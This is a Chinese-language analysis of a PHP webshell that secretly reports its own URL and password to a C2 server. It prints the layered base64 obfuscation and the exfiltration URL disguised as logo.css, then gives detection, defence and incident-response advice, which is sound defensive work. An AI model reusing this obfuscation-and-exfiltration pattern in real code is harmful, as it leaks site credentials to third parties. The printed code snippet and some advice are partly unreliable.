PHP木马分析与防御技术详解

一、木马样本概述

分析样本：5678.php后门程序
发现时间：2019年
特点：具有"黑吃黑"特性，即木马本身还包含另一个后门

二、核心代码分析

1. 主要功能函数：css_font

该函数实现了木马的核心通信机制：

$jiema = base64_decode(str_replace(str_replace('@','a',base64_decode('TVRreUxqRTJPQzR4TlRNdU1UTXpMM2h6Y3k1d0BIQjhNVEl6'))));

2. 编码解码过程详解

1. 原始数据：MTkyLjE2O**xNTMuMTMzL3hzcy5waHB8MTIz
2. 第一次处理：
   • 将字母'a'替换为'@'
   • 将等号'='替换为问号'?'
3. 第二次处理：进行Base64编码

3. 完整解码函数

function decode_backdoor($encoded) {
    $step1 = base64_decode($encoded);
    $step2 = str_replace('@', 'a', $step1);
    $step3 = base64_decode($step2);
    return $step3;
}

三、通信机制分析

1. 数据外传流程

1. 收集信息：后门访问路径URL + 后门密码
2. 编码处理：
   • 第一次Base64编码
   • 字符替换(a→@, =→?)
   • 第二次Base64编码
3. 发送至C2服务器：http://s.qsmyy.com/logo.css? + 编码后数据

2. 隐蔽通信特点

• 使用CSS文件作为掩护
• 采用多层编码增加分析难度
• 常规抓包工具(Burp Suite)难以直接发现

四、检测方法

1. 网络层面检测

1. 使用Wireshark抓包并过滤：

   • 查找对s.qsmyy.com的请求
   • 追踪TCP流(Follow TCP Stream)

2. Web服务器日志分析：

   • 检查异常CSS文件请求
   • 关注带有长参数值的logo.css请求

2. 代码层面检测

1. 查找特征字符串：

   • base64_decode(str_replace(str_replace
   • logo.css
   • @','a'

2. 检查异常函数调用：

   • 多层base64_decode嵌套
   • 非常规字符替换操作

五、防御措施

1. 预防措施

1. 文件上传限制：

   • 禁用PHP文件上传
   • 设置严格的文件类型检查

2. 服务器配置：

   • 关闭不必要的PHP危险函数(如base64_decode, system等)
   • 定期更新PHP版本

2. 监控措施

1. 实时监控：

   • 对异常域名(s.qsmyy.com等)的请求
   • 对/css文件的POST请求或带参数的GET请求

2. 日志分析：

   • 建立基线，监控异常访问模式
   • 对Base64编码的长参数进行特别检查

六、相关安全知识扩展

1. "黑吃黑"现象

• 常见于免费的黑客工具和木马程序
• 典型案例：菜刀工具后门版本
• 防御方法：始终验证工具来源，进行静态分析

2. 多层编码技术

1. 常见组合：

   • Base64 + 字符替换
   • 多轮Base64编码
   • 结合URL编码

2. 识别方法：

   • 查找重复的编码函数调用
   • 分析字符串替换模式

七、应急响应建议

1. 发现后门后的处理流程：

   • 立即隔离受感染系统
   • 分析木马通信的C2地址
   • 检查系统其他位置是否被植入
   • 修改所有相关凭证

2. 取证要点：

   • 保存原始木马文件
   • 记录网络连接日志
   • 检查文件创建时间和修改时间

八、参考资源

1. 分析工具：

   • Wireshark：网络流量分析
   • Burp Suite：Web请求分析
   • PHP静态分析工具

2. 学习资源：

   • Tide安全团队官网：http://www.TideSec.net
   • FreeBuf安全社区

通过本分析可以看出，现代PHP木马趋向于采用多层隐蔽技术和"黑吃黑"策略，安全人员需要掌握深度分析技术和建立全面的防御监控体系。